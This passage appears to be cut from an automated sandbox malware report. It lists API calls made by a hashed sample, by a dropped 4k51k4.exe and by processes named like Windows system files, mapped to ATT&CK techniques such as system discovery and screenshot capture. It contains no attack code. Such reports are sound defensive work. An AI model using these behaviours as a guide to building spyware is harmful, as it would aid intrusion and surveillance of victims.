9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb617630a21f000070fd7f9a5cc57700f0fd7f50c712004470fd7f00000000400000003f0000001f0000000070fd7f44c71200c15cc5776082cc771f0000000070fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00005900)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb6176c08c1e000040fd7f9a5cc57700f0fd7f50c712004440fd7f00000000400000003f000000200000000040fd7f44c71200c15cc5776082cc77200000000040fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00005744)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21b4701d01b47010016470100004401e414470188000000880000001768c47798174701ff2bc477afb9d177a41b4701ac0123000000230000004401c06d44011200a200aa040000c06d440150164701100000000000000013009d00aa040000c06d4401 (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21be701d01be7010016e7010000e401e414e70188000000880000001768c4779817e701ff2bc4771eb0d177a41be701ac012900000029000000e401c06de401140098001b040000c06de4015016e7011000000000000000150093001b040000c06de401 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21bdc01d01bdc010016dc010000d901e414dc0188000000880000001768c4779817dc01ff2bc4779977cc77a41bdc01ac012200000022000000d901c06dd90114009800ab040000c06dd9015016dc01100000000000000015009300ab040000c06dd901 (UID: 00000000-00005832)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21be101d01be1010016e1010000de01e414e10188000000880000001768c4779817e101ff2bc47763b4d177a41be101ac011e0000001e000000de01c06dde0116008e009c020000c06dde015016e1011000000000000000170089009c020000c06dde01 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb617628b822000050fd7f9a5cc57700f0fd7f50c712004450fd7f00000000400000003f000000200000000050fd7f44c71200c15cc5776082cc77200000000050fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00005852)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a00100005a1bb901581bb9018815b9010000b6016c14b90188000000880000001768c4772017b901ff2bc47782acd1772c1bb901ac011f0000001f000000b601905bb6011200a2005e030000905bb601d815b901100000000000000013009d005e030000905bb601 (UID: 00000000-00006092)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21b4a01d01b4a0100164a0100004701e4144a0188000000880000001768c47798174a01ff2bc4775aa3d177a41b4a01ac011f0000001f0000004701c06d4701140098001b040000c06d470150164a011000000000000000150093001b040000c06d4701 (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb617640e4230000c0fd7f9a5cc57700f0fd7f50c7120044c0fd7f00000000400000003f0000002000000000c0fd7f44c71200c15cc5776082cc772000000000c0fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21be301d01be3010016e3010000e001e414e30188000000880000001768c4779817e301ff2bc477d99bd177a41be301ac011c0000001c000000e001c06de001140098001b040000c06de0015016e3011000000000000000150093001b040000c06de001 (UID: 00000000-00004192)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21b5700d01b57000016570000005400e414570088000000880000001768c47798175700ff2bc4776999d177a41b5700ac0162000000620000005400c06d540016008e001f000000c06d5400501657001000000000000000170089001f000000c06d5400 (UID: 00000000-00006136)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb6176a09522000030fd7f9a5cc57700f0fd7f50c712004430fd7f00000000400000003f000000200000000030fd7f44c71200c15cc5776082cc77200000000030fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21bc801d01bc8010016c8010000c501e414c80188000000880000001768c4779817c801ff2bc4779594d177a41bc801ac012700000027000000c501c06dc501140098005e030000c06dc5015016c8011000000000000000150093005e030000c06dc501 (UID: 00000000-00003924)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21b4a01d01b4a0100164a0100004701e4144a0188000000880000001768c47798174a01ff2bc4774f94d177a41b4a01ac0120000000200000004701c06d470116008e009c020000c06d470150164a011000000000000000170089009c020000c06d4701 (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb61763085310000a0fd7f9a5cc57700f0fd7f50c7120044a0fd7f00000000400000003f0000002000000000a0fd7f44c71200c15cc5776082cc772000000000a0fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00004100)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21b5501d01b55010016550100005201e414550188000000880000001768c47798175501ff2bc477e886d177a41b5501ac012b0000002b0000005201c06d520116008e009c020000c06d5201501655011000000000000000170089009c020000c06d5201 (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21b4e01d01b4e0100164e0100004b01e4144e0188000000880000001768c47798174e01ff2bc4778f42cc77a41b4e01ac0128000000280000004b01c06d4b0116008e009c020000c06d4b0150164e011000000000000000170089009c020000c06d4b01 (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb617690c82c0000b0fd7f9a5cc57700f0fd7f50c7120044b0fd7f00000000400000003f0000002000000000b0fd7f44c71200c15cc5776082cc772000000000b0fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00003484)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00004144)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a00100005a1b3601581b360188153601000033016c14360188000000880000001768c47720173601ff2bc4775185d1772c1b3601ac0126000000260000003301905b33011200a200d1040000905b3301d8153601100000000000000013009d00d1040000905b3301 (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005832)\n \"WINLOGON.EXE\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005852)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006092)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004192)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006136)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003924)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003760)\n \"SERVICES.EXE\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00003484)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005900)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005744)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005648)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"GetWindowTextA\" (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"GetWindowTextA\" (UID: 00000000-00005900)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d0054db1200b3449e6b05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce212000b37be3510e0120010e012005ecb8e761401000000000000005d8c766ce212000e5d8c7604de1200dcaa9076010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d1593134e4db12006d82df770c8b2d0004010000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340031003800630036003500640038006600390039006400320061006200390034003600340032003300320034003000360064006200350061006300620062003200650037003400320036003800640065003500350032006500660036003100390039002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bc47769efd177d8eb6176ac0129000000290000000000000000000300ed0041020000000000000000000000000000000000000400e8004102000000000000000000003870290000000000200000000000000000000000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f0001000000ffffffff020000000800000060f92d0060f92d005bf92d000000000002000000b88f2b0000000000010000080000000054ed120095e1c077d13b0700feffffffccda12003f08757702000000b88f2b00000000000100001888fb7477bcda1200c81c907692dc120095fb7477f0db1200b88f2b0000000000000000000000000078db1200000029007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000d59313438db12006d82df770c8b2d0004010000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002556313450d412006d82df7764872f0004010000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00a4d01200b3449e6b0900000000000000000000000000000000000000000000000000000074010000000000000000000000000000bcd71200bb3dbe3560d5120060d512005ecb8e767401000000000000005d8c76bcd712000e5d8c7654d31200dcaa907601000000000000007a000000ffffffffffffffffdcd01200780200000000000025000000dcd012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000153313434d112006d82df772c8d2f0004010000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00003b00000000290000000000408f2f0098d012000464c47738012900e063c47702000000b88f2b000000000001000008d13b0700feffffffbcc7cc77c0c7cc770a000000800f000000002900188d2f00f83b0000ff07000000002900000000007f070000c4002900083029005926000048d0120067e5c17700002900188d2f000000000000002900000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007d52313488d012006d82df772c8d2f0004010000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000320028e8320023e8320000000000000000000000290000000001d4cc12000000000038da120095e1c077d13b0700feffffff435cc4775059c477aa000000b800000022e8320020e832005cce120094d21200000000000000000000000000000000000000000000000000001b0000000029001c5cc37760d8c575ffffffff170000000cce12002400000003000000fcd2120028d8120094d212008600000038ce120096edc4774ae83200a06a9a75860000005cce120094d212000000000086008800a06a9a755cce1200916c9a754ae83200a06a9a75a06a9a75ccd2120002020000 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015db01eea3a0720016db010200000018741e00609ba0720c16db017d9ba072328a9a72e4d31e0097a8a072020000000000000098d31e0018741e000816db0194f9120094f912003ff29872f015db01c3a5a0720016db0118741e00c0e5967298d31e0034000000d01bdb010000d801e02fdb01c0e59672d8f91200dcf91200000000004e0200009cfa120034000000340000001768c477d81bdb0100000000435cc477c5cdd1770016db012403d8010000d8015001d80193aba07200000000c06dd8015c15db010000000018741e004e02000000fa12005001d801b7aba072 (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0054db1200b3449e6b05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce212007e3d5e3d10e0120010e012005ecb8e761401000000000000005d8c766ce212000e5d8c7604de1200dcaa9076010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360045c9a13de4db12006d82df77fc691f0004010000 (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005900)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"IsWow64Process\" with parameter \"5648\" - (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"IsWow64Process\" with parameter \"5900\" - (UID: 00000000-00005900)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"5744\" - (UID: 00000000-00005744)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"5852\" - (UID: 00000000-00005852)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"6100\" - (UID: 00000000-00006100)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"6024\" - (UID: 00000000-00006024)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"4100\" - (UID: 00000000-00004100)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"3604\" - (UID: 00000000-00003604)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005832)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005852)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006092)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004192)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006136)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003924)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003760)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003484)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004144)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003400)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003688)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003604)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004088)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004288)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003420)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002460)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004140)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003996)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002296)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002772)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004328)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003268)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"402721939\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter 4k51k4.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005648)", 